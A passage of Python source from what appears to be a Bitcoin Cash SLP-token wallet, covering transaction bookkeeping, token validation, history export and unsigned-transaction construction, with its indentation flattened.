self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
### SLP: Handle incoming SLP transaction outputs here
self.handleSlpTransaction(tx_hash, tx)
"""
Callers are expected to take lock(s). We take no locks
"""
def handleSlpTransaction(self, tx_hash, tx):
txouts = tx.outputs()
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
token_type = 'SLP%d'%(e.args[0],)
for i, (_type, addr, _) in enumerate(txouts):
if _type == TYPE_ADDRESS and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': token_type,
'qty': None,
'token_id': None,
}
return
except (SlpParsingError, IndexError, OpreturnError):
return
if slpMsg.transaction_type == 'SEND':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# truncate outputs list
amounts = slpMsg.op_return_fields['token_output'][:len(txouts)]
for i, qty in enumerate(amounts):
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS and qty > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': qty,
}
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx_hash
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['initial_token_mint_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['initial_token_mint_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == "MINT":
token_id_hex = slpMsg.op_return_fields['token_id_hex']
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['additional_token_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['additional_token_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == 'COMMIT':
# ignore COMMs, they aren't producing any tokens.
return
else:
raise RuntimeError(slpMsg.transaction_type)
# On receiving a new SEND, MINT, or GENESIS always add entry to token_types if wallet hasn't seen tokenId yet
if slpMsg.transaction_type in [ 'SEND', 'MINT', 'GENESIS' ]:
if slpMsg.transaction_type == 'GENESIS':
tokenid = tx_hash
else:
tokenid = slpMsg.op_return_fields['token_id_hex']
new_token = True
for k, v in self.tx_tokinfo.items():
try:
if v['token_id'] == tokenid:
new_token = False
except KeyError:
pass
if new_token and tokenid not in self.token_types:
tty = { 'class': 'SLP%d'%(slpMsg.token_type,),
'decimals': "?",
'name': 'unknown-' + tokenid[:6]
}
if slpMsg.token_type == 65:
tty['group_id'] = "?"
self.token_types[tokenid] = tty
# Always add entry to tx_tokinfo
tti = { 'type':'SLP%d'%(slpMsg.token_type,),
'transaction_type':slpMsg.transaction_type,
'token_id': token_id_hex,
'validity': 0,
}
self.tx_tokinfo[tx_hash] = tti
if self.is_slp: # Only start up validation if SLP enabled
self.slp_check_validation(tx_hash, tx)
def revalidate(self, tx_hash, tx):
tti = self.tx_tokinfo[tx_hash]
tti['validity'] = 0
self.slp_check_validation(tx_hash, tx)
slp_gs_mgr.slp_validity_signal.emit(tx_hash, tti['validity'])
def slp_check_validation(self, tx_hash, tx):
""" Callers are expected to take lock(s). We take no locks """
tti = self.tx_tokinfo[tx_hash]
try:
is_new = self.token_types[tti['token_id']]['decimals'] == '?'
except:
is_new = False
if tti['validity'] == 0 and tti['token_id'] in self.token_types and not is_new and tti['type'] in ['SLP1','SLP65','SLP129']:
def callback(job):
if slp_gs_mgr.slp_validity_signal == None:
return
(txid,node), = job.nodes.items()
val = node.validity
tti['validity'] = val
slp_gs_mgr.slp_validity_signal.emit(txid, val)
if slp_gs_mgr.slpdb_validation_enabled:
try:
result = slp_slpdb_validator.check_validity(tx_hash)
if result >= slp_gs_mgr.slpdb_confirmations:
tti['validity'] = 1
return
else:
tti['validity'] = 2
return
except Exception as e:
raise Exception(f"Exception: {str(e)}")
if tti['type'] in ['SLP1']:
job = self.slp_graph_0x01.make_job(tx, self, self.network,
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
elif tti['type'] in ['SLP65', 'SLP129']:
job = self.slp_graph_0x01_nft.make_job(tx, self, self.network, nft_type=tti['type'],
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
if job is not None:
job.add_callback(callback)
# This was commented out because it spammed the log so badly
# it impacted performance. SLP validation can create a *lot* of jobs!
#finalization_print_error(job, f"[{self.basename()}] Job for {tx_hash} type {tti['type']} finalized")
def rebuild_slp(self,):
"""Wipe away old SLP transaction data and rerun on the entire tx set.
"""
with self.lock:
self._slp_txo = defaultdict(lambda: defaultdict(dict))
self.tx_tokinfo = {}
for txid, tx in self.transactions.items():
self.handleSlpTransaction(txid, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
self.tx_fees.pop(tx_hash, None)
self.tx_tokinfo[tx_hash] = {}
for addr, addrdict in self._slp_txo.items():
if tx_hash in addrdict: addrdict[tx_hash] = {}
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_slp_history(self, domain=None, validities_considered=(None,0,1)):
history = []
histories = self.get_slp_histories(domain=domain, validities_considered=validities_considered)
# Take separate token histories and flatten them, then sort them.
for token_id,t_history in histories.items():
for tx_hash, height, conf, timestamp, delta in t_history:
history.append((tx_hash, height, conf, timestamp, delta, token_id))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
return history
def get_slp_histories(self, domain=None, validities_considered=(0,1)):
# Based on get_history.
# We return a dict of histories, one history per token_id.
# get domain
if domain is None:
domain = self.get_addresses()
#1. Big iteration to find all deltas and put them in the right place.
token_tx_deltas = defaultdict(lambda: defaultdict(int)) # defaultdict of defaultdicts of ints :)
for addr in domain:
h = self.get_address_history(addr)
with self.lock:
addrslptxo = self._slp_txo[addr]
for tx_hash, height in h:
if tx_hash in self.pruned_txo.values():
continue
tti = self.tx_tokinfo.get(tx_hash)
if tti and tti['validity'] in validities_considered:
txdict = addrslptxo.get(tx_hash,{})
for idx,d in txdict.items():
if isinstance(d['qty'],int):
token_tx_deltas[d['token_id']][tx_hash] += d['qty'] # received!
# scan over all txi's, trying to find if they were tokens, which tokens, and how much
# (note that non-SLP txes can spend (burn) SLP --- and SLP of tokenA can burn tokenB)
for n, _ in self.txi.get(tx_hash, {}).get(addr, ()):
prevtxid, prevout_str = n.rsplit(':',1)
tti = self.tx_tokinfo.get(prevtxid)
if not (tti and tti['validity'] in validities_considered):
continue
prevout = int(prevout_str)
d = addrslptxo.get(prevtxid,{}).get(prevout,{})
if isinstance(d.get('qty',None),int):
token_tx_deltas[d['token_id']][tx_hash] -= d['qty'] # received!
# 2. create history (no sorting needed since balances won't be computed)
histories = {}
for token_id, tx_deltas in token_tx_deltas.items():
history = histories[token_id] = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
# 3. At this point we could compute running balances, but let's not.
return histories
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab bch history
h = self.get_history(domain, reverse=True)
out = []
# grab slp history
_slp_h = self.get_slp_history(domain=domain, validities_considered=(None,0,1,2,3,4))
def fmt_slp_amt(v, decimals):
if v is None:
return '--'
if decimals == "?":
decimals = 0
return format_satoshis(v, decimal_point=int(decimals), is_diff=True)
def get_token_info(token_id):
return self.token_types.get(token_id, {
'class': '?',
'decimals': 0,
'name': 'unknown'
})
slp_h = dict((tx_hash, { \
'value': fmt_slp_amt(delta, get_token_info(token_id)['decimals']), \
'token_id': token_id, \
'name': get_token_info(token_id)['name'] \
}) for tx_hash, _, _, _, delta, token_id in _slp_h)
def get_slp_tx(tx_hash):
if slp_h.get(tx_hash) is None:
return { 'value': '--', 'name': '--', 'token_id': '--' }
return slp_h.get(tx_hash)
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
slp_info = get_slp_tx(tx_hash)
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
'slp_value' : slp_info['value'],
'slp_name' : slp_info['name'],
'slp_token_id' : slp_info['token_id']
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def check_sufficient_slp_balance(self, slpMessage, config):
if self.is_slp:
if slpMessage.transaction_type == 'SEND':
total_token_out = sum(slpMessage.op_return_fields['token_output'])
valid_token_balance, _, _, valid_unfrozen_token_balance, _ = self.get_slp_token_balance(slpMessage.op_return_fields['token_id_hex'], config)
if total_token_out > valid_token_balance:
raise NotEnoughFundsSlp()
elif total_token_out > valid_unfrozen_token_balance:
raise NotEnoughUnfrozenFundsSlp()
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None, *, mandatory_coins=[]):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
for item in mandatory_coins:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [self.get_addresses()[0]]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr,
mandatory_coins=mandatory_coins)
else:
inputs = mandatory_coins + inputs
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Sort the inputs and outputs deterministically
if not mandatory_coins:
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def make_unsigned_transaction_for_bitcoinfiles(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info_for_bitcoinfiles(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
# determine if this transaction should utilize all available inputs
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
return
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
